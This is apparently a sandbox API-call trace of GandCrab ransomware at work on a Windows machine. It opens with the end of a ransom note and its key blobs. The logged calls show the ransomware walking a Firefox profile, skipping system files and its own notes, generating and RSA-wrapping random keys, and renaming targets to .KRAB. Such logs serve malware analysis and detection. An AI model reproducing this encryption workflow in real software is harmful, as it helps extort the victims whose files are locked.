KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0084.329] WriteFile (in: hFile=0x74c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338d6a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338d6a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0084.330] CloseHandle (hObject=0x74c) returned 1 [0084.330] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.334] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0084.335] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x1f, wMilliseconds=0x21e)) [0084.336] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0084.336] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0084.337] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0084.337] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\d2ca4a08d2ca4dee3d.lock") returned 179 [0084.337] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x74c [0084.338] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.338] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.338] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\") returned 156 [0084.338] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\*" [0084.338] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\*", lpFindFileData=0x338d6d0 | out: lpFindFileData=0x338d6d0) returned 0x1023838 [0084.338] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.338] FindNextFileW (in: hFindFile=0x1023838, lpFindFileData=0x338d6d0 | out: lpFindFileData=0x338d6d0) returned 1 [0084.339] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.339] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.339] FindNextFileW (in: hFindFile=0x1023838, lpFindFileData=0x338d6d0 | out: lpFindFileData=0x338d6d0) returned 1 [0084.339] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0084.339] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0084.339] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\d2ca4a08d2ca4dee3d.lock" [0084.339] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0084.339] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 184 [0084.339] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\d2ca4a08d2ca4dee3d.lock") returned 179 [0084.340] lstrlenW (lpString=".lock") returned 5 [0084.340] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0084.340] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0084.340] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.340] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.341] FindNextFileW (in: hFindFile=0x1023838, lpFindFileData=0x338d6d0 | out: lpFindFileData=0x338d6d0) returned 1 [0084.341] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0084.341] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0084.341] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\KRAB-DECRYPT.txt" [0084.341] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0084.341] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\KRAB-DECRYPT.txt.KRAB") returned 177 [0084.341] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\KRAB-DECRYPT.txt") returned 172 [0084.341] lstrlenW (lpString=".txt") returned 4 [0084.341] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0084.341] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0084.342] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.342] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\KRAB-DECRYPT.txt") returned 172 [0084.342] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\KRAB-DECRYPT.txt") returned 172 [0084.342] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0084.342] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0084.342] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0084.342] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0084.342] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0084.342] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0084.342] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0084.342] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0084.342] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0084.342] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0084.342] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.343] FindNextFileW (in: hFindFile=0x1023838, lpFindFileData=0x338d6d0 | out: lpFindFileData=0x338d6d0) returned 0 [0084.343] FindClose (in: hFindFile=0x1023838 | out: hFindFile=0x1023838) returned 1 [0084.343] CloseHandle (hObject=0x74c) returned 1 [0084.343] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338d950 | out: lpFindFileData=0x338d950) returned 1 [0084.343] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0084.343] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0084.343] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\KRAB-DECRYPT.txt" [0084.343] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0084.343] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\KRAB-DECRYPT.txt.KRAB") returned 168 [0084.344] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\KRAB-DECRYPT.txt") returned 163 [0084.344] lstrlenW (lpString=".txt") returned 4 [0084.344] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0084.344] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0084.344] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.344] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\KRAB-DECRYPT.txt") returned 163 [0084.344] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\KRAB-DECRYPT.txt") returned 163 [0084.344] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0084.344] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0084.344] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0084.344] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0084.344] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0084.345] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0084.345] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0084.345] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0084.345] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0084.345] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0084.345] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.346] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338d950 | out: lpFindFileData=0x338d950) returned 0 [0084.346] FindClose (in: hFindFile=0x1022ff8 | out: hFindFile=0x1022ff8) returned 1 [0084.346] CloseHandle (hObject=0x420) returned 1 [0084.346] FindNextFileW (in: hFindFile=0x1023338, lpFindFileData=0x338dbd0 | out: lpFindFileData=0x338dbd0) returned 1 [0084.346] lstrcmpW (lpString1="818200132aebmoouht.sqlite", lpString2=".") returned 1 [0084.346] lstrcmpW (lpString1="818200132aebmoouht.sqlite", lpString2="..") returned 1 [0084.346] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\", lpString2="818200132aebmoouht.sqlite" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" [0084.346] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0084.346] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite.KRAB") returned 152 [0084.347] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 147 [0084.347] lstrlenW (lpString=".sqlite") returned 7 [0084.347] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0084.347] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".sqlite ") returned 8 [0084.347] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.347] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 147 [0084.347] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned 147 [0084.347] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="desktop.ini") returned -1 [0084.347] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="autorun.inf") returned -1 [0084.347] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="ntuser.dat") returned -1 [0084.348] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="iconcache.db") returned -1 [0084.348] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="bootsect.bak") returned -1 [0084.348] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="boot.ini") returned -1 [0084.348] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="ntuser.dat.log") returned -1 [0084.348] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="thumbs.db") returned -1 [0084.348] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="KRAB-DECRYPT.html") returned -1 [0084.348] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="KRAB-DECRYPT.txt") returned -1 [0084.348] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="CRAB-DECRYPT.txt") returned -1 [0084.348] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="ntldr") returned -1 [0084.348] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="NTDETECT.COM") returned -1 [0084.348] lstrcmpiW (lpString1="818200132aebmoouht.sqlite", lpString2="Bootfont.bin") returned -1 [0084.348] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0084.348] CryptAcquireContextW (in: phProv=0x338dab4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dab4*=0x1010bd8) returned 1 [0084.350] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0084.350] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0084.351] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0084.351] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x20, pbBuffer=0x338db4c | out: pbBuffer=0x338db4c) returned 1 [0084.351] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0084.351] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.351] CryptAcquireContextW (in: phProv=0x338dab4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dab4*=0x10113d0) returned 1 [0084.354] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0084.354] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0084.354] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0084.354] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338db6c | out: pbBuffer=0x338db6c) returned 1 [0084.355] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0084.355] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.355] CryptAcquireContextW (in: phProv=0x338daac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338daac*=0x1010ce8) returned 1 [0084.358] CryptImportKey (in: hProv=0x1010ce8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dab0 | out: phKey=0x338dab0*=0x1022ff8) returned 1 [0084.358] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338daa4, pdwDataLen=0x338daa8, dwFlags=0x0 | out: pbData=0x338daa4*=0x800, pdwDataLen=0x338daa8*=0x4) returned 1 [0084.358] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338dadc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338dadc*=0x100) returned 1 [0084.358] GetLastError () returned 0x0 [0084.358] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0084.358] CryptReleaseContext (hProv=0x1010ce8, dwFlags=0x0) returned 1 [0084.358] CryptAcquireContextW (in: phProv=0x338daac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338daac*=0x10111b0) returned 1 [0084.362] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dab0 | out: phKey=0x338dab0*=0x1022ff8) returned 1 [0084.362] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338daa4, pdwDataLen=0x338daa8, dwFlags=0x0 | out: pbData=0x338daa4*=0x800, pdwDataLen=0x338daa8*=0x4) returned 1 [0084.362] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338dadc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338dadc*=0x100) returned 1 [0084.362] GetLastError () returned 0x0 [0084.362] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0084.363] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0084.363] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0084.363] VirtualAlloc 